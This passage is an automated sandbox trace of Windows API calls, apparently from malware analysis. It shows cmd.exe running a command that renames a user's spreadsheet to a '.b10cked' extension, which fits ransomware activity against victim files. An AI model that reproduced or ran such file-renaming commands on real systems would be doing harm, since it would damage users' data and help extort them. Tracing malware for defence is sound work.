(lpModuleName=0x0) returned 0x4a9c0000 [0142.496] __set_app_type (_Type=0x1) [0142.496] __p__fmode () returned 0x76b331f4 [0142.496] __p__commode () returned 0x76b331fc [0142.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0142.496] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0142.496] GetCurrentThreadId () returned 0xd68 [0142.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0142.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.496] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0142.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.497] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f7dc | out: phkResult=0x16f7dc*=0x0) returned 0x2 [0142.497] VirtualQuery (in: lpAddress=0x16f813, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0142.497] GetConsoleOutputCP () returned 0x1b5 [0142.497] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.497] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0142.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0142.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.498] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.498] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.498] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0142.498] GetEnvironmentStringsW () returned 0x2001c8* [0142.499] FreeEnvironmentStringsW (penv=0x2001c8) returned 1 [0142.499] GetEnvironmentStringsW () returned 0x2001c8* [0142.499] FreeEnvironmentStringsW (penv=0x2001c8) returned 1 [0142.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e74c | out: phkResult=0x16e74c*=0x40) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x0, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x0, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.499] RegCloseKey (hKey=0x40) returned 0x0 [0142.499] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e74c | out: phkResult=0x16e74c*=0x40) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x0, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x9, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x9, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x9, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.501] RegCloseKey (hKey=0x40) returned 0x0 [0142.501] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886371 [0142.501] srand (_Seed=0x5b886371) [0142.501] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"" [0142.501] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"" [0142.502] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.502] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x201928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0142.502] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.502] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.502] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.502] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.502] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.502] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.502] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.502] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.502] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.502] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.502] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.502] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.503] GetEnvironmentStringsW () returned 0x202318* [0142.503] FreeEnvironmentStringsW (penv=0x202318) returned 1 [0142.503] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.503] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.503] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.503] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.503] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0142.503] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.503] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.503] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.503] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.503] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f518 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.503] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f518, lpFilePart=0x16f514 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f514*="Desktop") returned 0x18 [0142.503] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.671] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f294 | out: lpFindFileData=0x16f294) returned 0x200058 [0142.671] FindClose (in: hFindFile=0x200058 | out: hFindFile=0x200058) returned 1 [0142.671] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f294 | out: lpFindFileData=0x16f294) returned 0x200058 [0142.671] FindClose (in: hFindFile=0x200058 | out: hFindFile=0x200058) returned 1 [0142.671] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f294 | out: lpFindFileData=0x16f294) returned 0x200058 [0142.672] FindClose (in: hFindFile=0x200058 | out: hFindFile=0x200058) returned 1 [0142.672] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.672] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0142.672] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0142.672] GetEnvironmentStringsW () returned 0x202b38* [0142.672] FreeEnvironmentStringsW (penv=0x202b38) returned 1 [0142.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.673] GetConsoleOutputCP () returned 0x1b5 [0142.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.673] GetUserDefaultLCID () returned 0x409 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f658, cchData=128 | out: lpLCData="0") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f658, cchData=128 | out: lpLCData="0") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f658, cchData=128 | out: lpLCData="1") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0142.674] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.675] GetConsoleTitleW (in: lpConsoleTitle=0x1f0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.675] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.675] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.675] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.676] _wcsicmp (_String1="move", _String2=")") returned 68 [0142.676] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0142.676] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0142.676] _wcsicmp (_String1="IF", _String2="move") returned -4 [0142.676] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0142.676] _wcsicmp (_String1="REM", _String2="move") returned 5 [0142.676] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0142.680] GetConsoleTitleW (in: lpConsoleTitle=0x16f350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.681] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0142.681] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0142.681] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0142.681] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0142.681] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="CD") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="REN") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0142.681] _wcsicmp (_String1="move", _String2="SET") returned -6 [0142.681] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0142.681] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0142.681] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0142.681] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0142.681] _wcsicmp (_String1="move", _String2="MD") returned 11 [0142.681] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0142.681] _wcsicmp (_String1="move", _String2="RD") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0142.681] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0142.681] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0142.681] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0142.682] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0142.682] _wcsicmp (_String1="move", _String2="VER") returned -9 [0142.682] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0142.682] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0142.682] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0142.682] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0142.682] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0142.682] _wcsicmp (_String1="move", _String2="START") returned -6 [0142.682] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0142.682] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0142.682] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0142.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.684] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f10c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f104, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f104*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.686] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0142.686] _wcsicmp (_String1="9bQDI69.ods", _String2=".") returned 11 [0142.686] _wcsicmp (_String1="9bQDI69.ods", _String2="..") returned 11 [0142.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods")) returned 0x20 [0142.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201ea8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.687] SetErrorMode (uMode=0x0) returned 0x0 [0142.687] SetErrorMode (uMode=0x1) returned 0x0 [0142.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", nBufferLength=0x104, lpBuffer=0x16ea94, lpFilePart=0x16ea7c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", lpFilePart=0x16ea7c*="9bQDI69.ods") returned 0x35 [0142.687] SetErrorMode (uMode=0x0) returned 0x1 [0142.687] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x12 [0142.687] _wcsicmp (_String1="9bQDI69.ods", _String2=".") returned 11 [0142.687] _wcsicmp (_String1="9bQDI69.ods", _String2="..") returned 11 [0142.687] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods")) returned 0x20 [0142.687] SetErrorMode (uMode=0x0) returned 0x0 [0142.687] SetErrorMode (uMode=0x1) returned 0x0 [0142.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", nBufferLength=0x104, lpBuffer=0x16ef10, lpFilePart=0x16eca8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", lpFilePart=0x16eca8*="9bQDI69.ods") returned 0x35 [0142.687] SetErrorMode (uMode=0x0) returned 0x1 [0142.688] SetErrorMode (uMode=0x0) returned 0x0 [0142.688] SetErrorMode (uMode=0x1) returned 0x0 [0142.688] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", nBufferLength=0x104, lpBuffer=0x16f118, lpFilePart=0x16eca8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", lpFilePart=0x16eca8*="9bQDI69.ods.b10cked") returned 0x3d [0142.688] SetErrorMode (uMode=0x0) returned 0x1 [0142.688] SetLastError (dwErrCode=0x0) [0142.688] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods.b10cked")) returned 0xffffffff [0142.688] GetLastError () returned 0x2 [0142.688] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", fInfoLevelId=0x1, lpFindFileData=0x16e624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e624) returned 0x1f0f08 [0142.688] FindNextFileW (in: hFindFile=0x1f0f08, lpFindFileData=0x16e624 | out: lpFindFileData=0x16e624) returned 0 [0142.689] GetLastError () returned 0x12 [0142.689] FindClose (in: hFindFile=0x1f0f08 | out: hFindFile=0x1f0f08) returned 1 [0142.690] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", fInfoLevelId=0x1, lpFindFileData=0x201c48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x201c48) returned 0x1f0f08 [0142.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", nBufferLength=0x104, lpBuffer=0x16e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", lpFilePart=0x0) returned 0x3d [0142.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", nBufferLength=0x104, lpBuffer=0x16e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", lpFilePart=0x0) returned 0x35 [0142.691] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: 